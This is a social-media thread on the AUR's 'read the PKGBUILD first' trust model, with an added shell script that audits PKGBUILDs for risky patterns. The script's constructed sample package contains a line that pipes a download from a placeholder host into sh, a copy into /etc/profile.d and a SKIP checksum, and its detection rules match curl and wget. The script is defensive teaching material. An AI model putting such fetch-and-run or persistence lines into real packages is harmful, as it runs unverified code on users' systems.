@avesbury_rosetta I just read through the build scripts like you're supposed to and also mostly just don't use the AUR
@avesbury_rosetta like for years the Arch wiki has been perfectly clear that the trust model of the AUR is "someone could just upload a malicious package, you absolutely have to read through it first before you build and install it"
@stellarskylark @avesbury_rosetta yeah but most people don't know how to read bash scripts, and sometimes a piece of software just isn't packaged literally anywhere else, like on Linux in general :(
@hazelnot @avesbury_rosetta PKGBUILD scripts aren't usually that complicated, it's usually "fetch the source, run make, and install these files" and so it's relatively easy to see if it's doing something suspicious like fetching the wrong source or installing unusual files
like yeah I get it, it's not as user-friendly as other stuff, building packages is complicated. but it's not like this wasn't explicitly a possibility Arch users were warned to watch out for
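Added example (not from anyone in this thread, and not an Arch or AUR tool): a small POSIX shell script that applies the review checklist from the post above to a PKGBUILD, looking for the things a reader is told to look for: sources fetched over plain HTTP, checksums set to `SKIP` (so the download is never verified), network fetches hidden inside `prepare()`/`build()`/`package()` that bypass the `source=()` array, and `package()` writing to absolute paths without `$pkgdir`. The PKGBUILD text, the `example.com`/`mirror.example.net` URLs and the function names are all constructed for the demonstration; the sample deliberately contains one instance of each pattern so every check fires once.

```shell
#!/bin/sh
# Constructed PKGBUILD (hypothetical package, placeholder URLs) that trips every check once.
PKGBUILD_TEXT='pkgname=examplepkg
pkgver=1.0
pkgrel=1
arch=(x86_64)
source=("https://example.com/examplepkg-1.0.tar.gz"
        "http://mirror.example.net/extra-patch.sh")
sha256sums=("0000000000000000000000000000000000000000000000000000000000000000"
            "SKIP")

build() {
  cd "$pkgname-$pkgver"
  make
}

package() {
  cd "$pkgname-$pkgver"
  make DESTDIR="$pkgdir" install
  cp "$srcdir/extra-patch.sh" /etc/profile.d/extra.sh
  curl -s https://example.com/post-install | sh
}'

# Constructed PKGBUILD with none of the patterns, used as the control case.
CLEAN_PKGBUILD='source=("https://example.com/x-1.0.tar.gz")
sha256sums=("aaaa")
build() {
  make
}
package() {
  make DESTDIR="$pkgdir" install
}'

# list_sources PKGBUILD_TEXT: print each quoted entry of the source=() array, one per line.
list_sources() {
  printf '%s\n' "$1" | awk '
    /^source=\(/ { insrc = 1 }
    insrc {
      while (match($0, /"[^"]*"/)) {
        print substr($0, RSTART + 1, RLENGTH - 2)
        $0 = substr($0, RSTART + RLENGTH)
      }
    }
    insrc && /\)/ { insrc = 0 }
  '
}

# audit_pkgbuild PKGBUILD_TEXT: print one finding per line (nothing if the file looks ordinary).
audit_pkgbuild() {
  pkgbuild="$1"

  # 1. Plain-HTTP sources can be tampered with in transit; flag them.
  list_sources "$pkgbuild" | grep -E '^http://' | sed 's/^/plain-http source: /'

  # 2. A SKIP checksum means makepkg never verifies what it downloaded.
  printf '%s\n' "$pkgbuild" | awk '
    /sums=\(/ { insum = 1 }
    insum && /"SKIP"/ { print "unverified source (SKIP checksum)" }
    insum && /\)/ { insum = 0 }
  '

  # 3. Network access inside the build functions bypasses source=() and its checksums.
  # 4. package() writing to an absolute path without $pkgdir puts files outside the package.
  printf '%s\n' "$pkgbuild" | awk '
    /^(prepare|build|package)\(\)/ { infn = 1; fn = $1 }
    infn && /(^|[^a-zA-Z_])(curl|wget|git clone)[ \t]/ { print "network fetch inside " fn ": " $0 }
    infn && fn == "package()" && /[ \t]\/(etc|usr|home|root)\// && $0 !~ /\$pkgdir|\$\{pkgdir\}/ {
      print "write outside $pkgdir in package(): " $0
    }
    infn && /^}/ { infn = 0 }
  '
}

# count_findings PKGBUILD_TEXT: number of findings, as a bare integer.
count_findings() {
  audit_pkgbuild "$1" | wc -l | tr -d ' '
}

audit_pkgbuild "$PKGBUILD_TEXT"
```

Run it against a real PKGBUILD with `audit_pkgbuild "$(cat PKGBUILD)"`. The checks are deliberately coarse pattern matches, so a finding is a prompt to read that line carefully, not a verdict; a PKGBUILD that produces no findings has still not been reviewed until you have looked at what `source=()` points at and what `package()` installs.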
@stellarskylark @avesbury_rosetta yeah but until now it was theoretical, if I'd known it would get this bad I would've never even touched the AUR
But then that means using shit like AppImages which, ew, fashy bullshit
🍉